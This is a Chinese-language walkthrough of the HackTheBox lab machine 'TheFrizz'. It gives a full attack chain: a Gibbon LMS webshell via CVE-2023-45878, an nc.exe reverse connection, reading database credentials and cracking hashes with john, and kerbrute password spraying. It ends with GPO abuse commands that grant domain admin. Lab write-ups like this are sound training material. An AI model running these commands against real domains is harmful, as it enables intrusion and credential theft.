信息收集

nmap -sV -sC -O 10.10.11.60

Nmap scan report for 10.10.11.60

Host is up (0.63s latency).

Not shown: 987 filtered tcp ports (no-response)

PORT     STATE SERVICE       VERSION

22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)

53/tcp   open  domain        Simple DNS Plus

80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)

|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12

|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-06 16:58:47Z)

135/tcp  open  msrpc         Microsoft Windows RPC

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)

445/tcp  open  microsoft-ds?

464/tcp  open  kpasswd5?

593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

636/tcp  open  tcpwrapped

3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)

3269/tcp open  tcpwrapped

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)

OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016

Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)

No exact OS matches for host (test conditions non-ideal).

Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| smb2-security-mode:

|   3:1:1:

|_    Message signing enabled and required

|_clock-skew: 6h40m55s

| smb2-time:

|   date: 2025-04-06T16:59:55

|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 170.30 seconds

CVE-2023-45878

有个web服务,搜一下有cve,可以读sql文件

http://frizzdc.frizz.htb/Gibbon-LMS//?q=./gibbon.sql

没用,继续搜,CVE-2023-45878,写webshell



蚁剑连接,传个nc.exe上去反连

net user /domain

a.perlstein

Administrator

c.ramon

c.sandiego

d.hudson

f.frizzle

g.frizzle

Guest

h.arm

J.perlstein

k.franklin

krbtgt

l.awesome

m.ramon

M.SchoolBus

p.terese

r.tennelli

t.wright

v.frizzle

w.li

w.Webservice

mysql

查看config.php内容,拿到mysql账号密码

$databaseServer = 'localhost';

$databaseUsername = 'MrGibbonsDB';

$databasePassword = 'MisterGibbs!Parrot!?1';

$databaseName = 'gibbon';

使用frp把3306端口代理出来,用navicat连接,查看gibbonperson表,拿到密码和盐值

067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03$/aACFhikmNopqrRTVz2489

john爆破

john --format=dynamic='sha256($s.$p)' --wordlist=/usr/share/wordlists/rockyou.txt 1.hash

拿到密码:***********

因为没开5985端口,所以不能通过winrm登录,这里通过获取f.frizzle票据通过ssh去登录

Kerberos认证

修改/etc/krb5.conf

[libdefaults]

	default_realm = FRIZZ.HTB

# The following krb5.conf variables are only for MIT Kerberos.

	kdc_timesync = 1

	ccache_type = 4

	forwardable = true

	proxiable = true

        rdns = false

# The following libdefaults parameters are only for Heimdal Kerberos.

	fcc-mit-ticketflags = true

[realms]

    FRIZZ.HTB = {

        kdc = frizzdc.frizz.htb

        admin_server = frizzdc.firzz.htb

        default_domain = frizz.htb

    }

[domain_realm]

    .frizz.htb = FRIZZ.HTB

    frizz.htb = FRIZZ.HTB

kinit f.frizzle@FRIZZ.HTB 去请求票据

klist 查看票据



ssh f.frizzle@frizz.htb -K 通过票据去登录,读取desktop/user.txt

bloodhound

一直超时,我cnm,只好传个SharpHound.exe上去收集,卡到怀疑人生,最后通过nc将压缩包传回kali

分析f.frizzle的域关系网,什么都没有。废物用户,回收站翻到一个压缩包



通过nc传输,等了半天,解压缩找密码

grep -IR "wapt_password",为什么这么找?因为文件名是这个,直接搜password太多了

拿到密码:!suBcig@MehTed!R

密码喷洒一下,kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 user.txt '!suBcig@MehTed!R'



是M.SchoolBus的,ssh连上去



这环境shi一样,接下来说思路,bloodhound查看M.SchoolBus的关系网



M.SchoolBus属于GPCO组,说明M.SchoolBus可以打GPO Abuse,写一个恶意GPO进去来进行提权

// 创建恶意GOP

New-GPO -Name "hacker"

// 链接GPO到域控制器

New-GPLink -Name "hacker" -Target "OU=Domain Controllers,DC=frizz,DC=htb"

// 将M.SchoolBus加入域管理员组

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName hacker

// 刷新GPO

gpupdate /force

结束

HTB打靶记录-TheFrizz的更多相关文章

  1. VulnHub-Earth 打靶记录

    目录 VulnHub-Earth 打靶记录 知识点 目标探测 信息收集 Shell反弹&信息二次收集 提权 权限维持 VulnHub-Earth 打靶记录 搭建靶场的时候一定要使用NATser ...

  2. 【HTB系列】靶机Chaos的渗透测试详解

    出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) 知识点: 通过域名或者IP可能会得到网站的不同响应 Wpscan的扫描wordpress ...

  3. CSS3中的动画效果记录

    今天要记录的是CSS3中的三种属性transform.transition以及animation,这三个属性大大提升了css处理动画的能力. 一.Transform 变形 CSS中transform ...

  4. 利用jdk中工具完成Java程序监控方法记录

    转载加自己整理的部分内容,转载自:http://jiajun.iteye.com/blog/810150 记录下JConsole使用方法 一.JConsole是什么    从Java 5开始 引入了 ...

  5. 递归计算战士打靶S次打了N环一共同拥有多少种可能的问题

    问题描写叙述 一个战士打了10次靶.一共打了90环,问一共同拥有多少种可能,并输出这些可能的组合. 思路 首先.嵌套10层循环进行穷举是不可取的,一是由于速度太慢,二是假设改成打20次靶就完蛋了. 事 ...

  6. RAR 5.50 控制台使用记录

    copy from  WinRAR用户手册,备忘 用户手册 ~~~~~~~~ RAR 5.50 控制台版本 ~~~~~~~~~~~~~~~~~~~ =-=-=-=-=-=-=-=-=-=-=-=-=- ...

  7. 【HTB系列】靶机Frolic的渗透测试详解

    出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) Hack The Box是一个CTF挑战靶机平台,在线渗透测试平台.它能帮助你提升渗透测 ...

  8. 打靶笔记-03-vulhub-Moriarty Corp

    打靶笔记-03-vulhub-BoredHackerBlog 一.靶机信息 Name: BoredHackerBlog: Moriarty Corp(中-高级难度) Date release: 29 ...

  9. 打靶笔记-01-vulnhub-moneybox

    打靶笔记-01-vulnhub-moneybox 本篇笔记根据苑老师视频进行学习记录 https://www.bilibili.com/video/BV1Lv411n7Lq/?spm_id_from= ...

  10. webug4.0 打靶笔记-02【完结】

    webug4.0打靶笔记-02 3. 延时注入(时间盲注) 3.1 访问靶场 3.2 寻找注入点 貌似一样的注入点: ?id=1' --+ 3.3 判断输出位置 同前两关一样的位置,时间盲注应该不是这 ...

随机推荐

  1. 【Docker】---部署集群(2)

    RocketMQ(2)-Docker集群部署RocketMQ =前言= 1.因为自己只买了一台阿里云服务器,所以RocketMQ集群都部署在单台服务器上只是端口不同,如果实际开发,可以分别部署在多台服 ...

  2. Linux 提权指南

    知屋漏者在宇下,知政失者在草野,知经误者在诸子. 导航 壹 - 密码搜寻 贰 - Sudo 命令 叁 - SUID/SGID 特权 肆 - 计划任务 伍 - 文件/目录 陆 - Linux 内核 柒 ...

  3. 微服务测试 Dubbo 接口测试

    微服务测试 Dubbo 接口测试 URL:https://blog.csdn.net/qq_35759632/article/details/80832932 微服务测试 ----Dubbo 接口测试 ...

  4. MySQL系统命令

    原文链接:https://blog.liuzijian.com/post/34b3b940-c053-9d75-06e2-07a2e7aeedc3.html 登录命令 mysql -h 主机 -P 端 ...

  5. ECharts中实现x轴中的坐标以不同间距显示的效果

    1.需求描述 我们日常在使用ECharts实现曲线图或柱状图的时候,x轴上的坐标都是等距离显示的. 有时候我们可能有这个需求: x轴上的坐标距离按照对应数据的比例进行显示. 打个比方,假设x轴上有5个 ...

  6. CF1896H2

    看不懂的题 首先考虑 \([a_i\neq b_i]=-2a_ib_i+a_i+b_i\),所以: \[f(a,b)=\sum a_i+\sum b_i-2\sum a_ib_i=N-2\sum a_ ...

  7. 【忍者算法】从图书馆找书到矩阵搜索:探索二维矩阵中的高效搜索|LeetCode第240题 搜索二维矩阵 II

    从图书馆找书到矩阵搜索:探索二维矩阵中的高效搜索 生活中的搜索策略 想象你在一个大型图书馆里找书.这个图书馆的书架是按照两个维度排列的:每个书架从左到右按书名字母顺序排列,从上到下的书架则按照出版年份 ...

  8. "最新"部署幻兽帕鲁游戏服务器及开局经验分享

    Banner 2024,<幻兽帕鲁><雾锁王国>等游戏爆火!那么如何快速拥有一个可以跟小伙伴们愉快玩耍的服务器呢?社区里不少小伙伴已经给出了自己的最佳实践,你甚至不需要懂技术, ...

  9. [BZOJ3514] [Codechef MARCH14] GERALD07加强版 题解

    名字感觉挺奇怪的. 考虑离线算法.首先答案就是用 \(n\) 减去连完边后的生成树森林边数.生成树当然就可以用 \(lct\) 求解了.我是不会告诉你这个时候我已经开始想回滚莫队了的. 考虑当我们倒序 ...

  10. 在Unity中玩转表达式树:解锁游戏逻辑的动态魔法

    html { overflow-x: initial !important } :root { --bg-color: #ffffff; --text-color: #333333; --select ...